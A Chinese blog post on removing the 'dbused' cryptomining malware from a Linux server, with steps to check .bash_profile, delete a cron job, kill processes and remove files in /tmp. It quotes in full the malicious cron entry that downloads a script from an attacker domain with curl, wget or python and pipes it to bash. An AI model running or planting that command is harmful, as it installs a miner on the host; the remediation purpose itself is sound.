dbused把我的CPU占满了!服务器挖矿病毒的解决办法

现象描述

1、通过xshell连接出现非常严重的卡顿,进入后发现CPU被名为dbused的进程占满了

 当初按照百度和csdn的文档进行处理病毒的时候,都是指标不治本,清理了一段时间第二天打开电脑,它又起来了,就是反反复复很是难受,我总结了一下别人的经验加自己如何处理的。

解决方案:

1.首先查看dbused进程是哪个用户启动的。

2. vim /home/tidb/.bash_profile  这个文件最后一行如果又下面这个命令 一定要删除  注意:哪个用户启动的dbsed就去哪个用户的家目录去查看,这里以tidb为例。

 3.cd /var/spool/cron   查看周期性计划任务   并删除下面任务 
 * * * * * (curl -fsSL http://bash.givemexyz.in/xms||wget -q -O- http://bash.givemexyz.in/xms||python -c 'import urllib2 as fbi;print fbi.urlopen("http://bash.givemexyz.in/xms").read()')| bash -sh; lwp-download http://bash.givemexyz.in/xms /tmp/xms; bash /tmp/xms; /tmp/xms; rm -rf /tmp/xms

 4.杀掉进程

   kill bashirc
   kill dbused 

5. 进入到/tmp 目录下删除病毒文件
bashirc dbused sshcheck 都为病毒文件  

6.间隔一小时查看病毒是否还会启动


版权声明:本文为qq_52487413原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接和本声明。